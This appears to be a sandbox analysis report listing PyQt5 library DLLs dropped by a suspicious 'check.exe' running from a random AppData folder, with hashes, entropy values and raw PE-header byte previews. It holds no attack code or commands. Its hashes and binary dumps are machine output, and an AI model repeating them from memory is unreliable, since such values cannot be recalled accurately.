MD5:	6BC084255A5E9EB8DF2BCD75B4CD0777
SHA1:	CF071AD4E512CD934028F005CABE06384A3954B6
SHA-256:	1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
SHA-512:	B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......\|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\d3dcompiler_47.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4173928
Entropy (8bit):	6.329102290474506
Encrypted:	false
SSDEEP:	49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
MD5:	B0AE3AA9DD1EBD60BDF51CB94834CD04
SHA1:	EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
SHA-256:	E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
SHA-512:	756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libEGL.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25072
Entropy (8bit):	5.961464514165753
Encrypted:	false
SSDEEP:	384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
MD5:	BB00EF1DD81296AF10FDFA673B4D1397
SHA1:	773FFCF4A231B963BAAC36CBEF68079C09B62837
SHA-256:	32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
SHA-512:	C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libGLESv2.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3385328
Entropy (8bit):	6.382356347494905
Encrypted:	false
SSDEEP:	49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
MD5:	2247EE4356666335DF7D72129AF8D600
SHA1:	F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
SHA-256:	50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
SHA-512:	67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\opengl32sw.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20923392
Entropy (8bit):	6.255903817217008
Encrypted:	false
SSDEEP:	393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
MD5:	7DBC97BFEE0C7AC89DA8D0C770C977B6
SHA1:	A064C8D8967AAA4ADA29BD9FEFBE40405360412C
SHA-256:	963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
SHA-512:	286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68080
Entropy (8bit):	6.207162014262433
Encrypted:	false
SSDEEP:	1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
MD5:	750A31DE7840B5EED8BA14C1BD84D348
SHA1:	D345D13B0C303B7094D1C438E49F0046791DE7F6
SHA-256:	A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
SHA-512:	5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	41968
Entropy (8bit):	6.0993566622860635
Encrypted:	false
SSDEEP:	768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
MD5:	313F89994F3FEA8F67A48EE13359F4BA
SHA1:	8C7D4509A0CAA1164CC9415F44735B885A2F3270
SHA-256:	42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
SHA-512:	06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:..i..i..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qgif.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39408
Entropy (8bit):	6.0316011626259405
Encrypted:	false
SSDEEP:	768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
MD5:	52FD90E34FE8DED8E197B532BD622EF7
SHA1:	834E280E00BAE48A9E509A7DC909BEA3169BDCE2
SHA-256:	36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
SHA-512:	EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qicns.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45040
Entropy (8bit):	6.016125225197622
Encrypted:	false
SSDEEP:	768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
MD5:	AD84AF4D585643FF94BFA6DE672B3284
SHA1:	5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
SHA-256:	F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
SHA-512:	B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qico.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38384
Entropy (8bit):	5.957072398645384
Encrypted:	false
SSDEEP:	768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
MD5:	A9ABD4329CA364D4F430EDDCB471BE59
SHA1:	C00A629419509929507A05AEBB706562C837E337
SHA-256:	1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
SHA-512:	004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	421360
Entropy (8bit):	5.7491063936821405
Encrypted:	false
SSDEEP:	6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
MD5:	16ABCCEB70BA20E73858E8F1912C05CD
SHA1:	4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
SHA-256:	FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
SHA-512:	3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..\|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qsvg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32240
Entropy (8bit):	5.978149408776758
Encrypted:	false
SSDEEP:	768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
MD5:	C0DE135782FA0235A0EA8E97898EAF2A
SHA1:	FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
SHA-256:	B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
SHA-512:	7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtga.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	5.865766652452823
Encrypted:	false
SSDEEP:	768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
MD5:	A913276FA25D2E6FD999940454C23093
SHA1:	785B7BC7110218EC0E659C0E5ACE9520AA451615
SHA-256:	5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
SHA-512:	CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtiff.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	390128
Entropy (8bit):	5.724665470266677
Encrypted:	false
SSDEEP:	6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
MD5:	9C0ACF12D3D25384868DCD81C787F382
SHA1:	C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
SHA-256:	825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
SHA-512:	45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30192
Entropy (8bit):	5.938644231596902
Encrypted:	false
SSDEEP:	768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
MD5:	68919381E3C64E956D05863339F5C68C
SHA1:	CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
SHA-256:	0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
SHA-512:	6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwebp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	510448
Entropy (8bit):	6.605517748735854
Encrypted:	false
SSDEEP:	12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
MD5:	308E4565C3C5646F9ABD77885B07358E
SHA1:	71CB8047A9EF0CDB3EE27428726CACD063BB95B7
SHA-256:	6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
SHA-512:	FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qminimal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	844784
Entropy (8bit):	6.625808732261156
Encrypted:	false
SSDEEP:	12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
MD5:	2F6D88F8EC3047DEAF174002228219AB
SHA1:	EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
SHA-256:	05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
SHA-512:	0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754672
Entropy (8bit):	6.6323155845799695
Encrypted:	false
SSDEEP:	12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
MD5:	6407499918557594916C6AB1FFEF1E99
SHA1:	5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
SHA-256:	54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
SHA-512:	8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.\|.JQ..KT..K...K.\|.Js..K.\|.JS..K.\|.JU..K.\|[KU..K.\|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwebgl.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	482288
Entropy (8bit):	6.152380961313931
Encrypted:	false
SSDEEP:	6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
MD5:	1EDCB08C16D30516483A4CBB7D81E062
SHA1:	4760915F1B90194760100304B8469A3B2E97E2BC
SHA-256:	9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
SHA-512:	0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwindows.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1477104
Entropy (8bit):	6.575113537540671
Encrypted:	false
SSDEEP:	24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
MD5:	4931FCD0E86C4D4F83128DC74E01EAAD
SHA1:	AC1D0242D36896D4DDA53B95812F11692E87D8DF
SHA-256:	3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
SHA-512:	0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
